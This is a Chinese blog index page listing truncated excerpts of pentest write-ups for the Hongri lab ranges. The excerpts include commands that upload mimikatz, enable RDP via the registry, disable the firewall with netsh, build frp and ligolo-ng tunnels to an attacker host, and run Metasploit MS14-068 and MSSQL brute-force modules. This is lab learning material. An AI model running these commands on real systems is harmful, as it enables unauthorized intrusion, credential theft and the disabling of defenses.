最新发布第34页
排序
红日靶场1.2 横向突破DC
前期准备发现我是administrator上传mimikatz.exe 允许RDPreg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v 'fDenyTSConnections' /t REG_DWORD /d 0 /f 关闭防火墙netsh ...
红日靶场2
实验环境内网网段:10.10.10.1/24DMZ网段:192.168.111.1/24配置信息DCOS:Windows 2012(64)IP:10.10.10.10应用:AD域WEBOS:Windows 2008(64)IP1:10.10.10.80IP2:192.168.111.80PCOS:Windo...
红日靶场4.1 Tomcat 8.5.19漏洞与docker逃逸
环境说明机器密码ubuntu:ubuntu域成员机器douser:Dotest123DC:administrator:Test2008 ubuntu为入口机器在该机器上执行ubuntu@ubuntu:~$ sudo docker start ec814f6ee002 ec814f6ee002 ubuntu@...
红日靶场4.2 隧道建立 msf正向shell与全局代理 机器脱域处理
隧道建立使用frp建立隧道https://github.com/fatedier/frp/releases?page=3 编辑frpc.ini[common] server_addr = 192.168.157.129 server_port = 7000 [socks_proxy] type = tcp plugin=socks5...
红日靶场4.3 MS14-068(CVE-2014-6324)域控提权利用
参考资料:https://www.cnblogs.com/feizianquan/p/11760564.html 漏洞验证查看SID whoami /usermsfconsole -q search MS14-068 use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set...
红日靶场3.1 Joomla密码更改
环境web 外网服务器web2win2008pcwin2012 DC 信息收集发现80端口用JoomlaJoomscanjoomscan -u http://192.168.0.107[+] Detecting Joomla Version [++] Joomla 3.9.12 [+] admin finder [++]...
红日靶场5 ThinkPHP漏洞
环境win7 当作外网服务器 win2008 当作DCkali为攻击机器 外网128 外网网段192.168.135.0/24内网网段 192.168.138.0/24 win7开启phpstudy 信息收集nmap 192.168.135.0/24找到win7的外网地址...
红日靶场7.1 Redis渗透复习与环境变量提权
环境攻击者IP 192.168.1.129web1 Ubuntu外网IP 192.168.1.128 信息收集arp-scan -I eth1 -l找到目标主机IP为192.168.1.128nmap -T5 -A -p- -n -vvv -noscript 192.168.1.12880,81端口开放 ...
红日靶场3.2 隧道建立与内网横向
隧道建立使用ligolo-ngkaliip tuntap add user root mode tun ligolo ip link set ligolo up proxy -selfcertweb./agent -connect 192.168.0.103:11601 -retry -ignore-certkalisession 1 start...
红日靶场3 补充 mssql爆破
在win2008上扫描到了mssql 使用之前收集到的用户名和密码testuser cvcvgjASD!@wwwuser wwwuser_123Aqx 直接复制到/tmp/user.txt中use auxiliary/scanner/mssql/mssql_login set rhosts 192.16...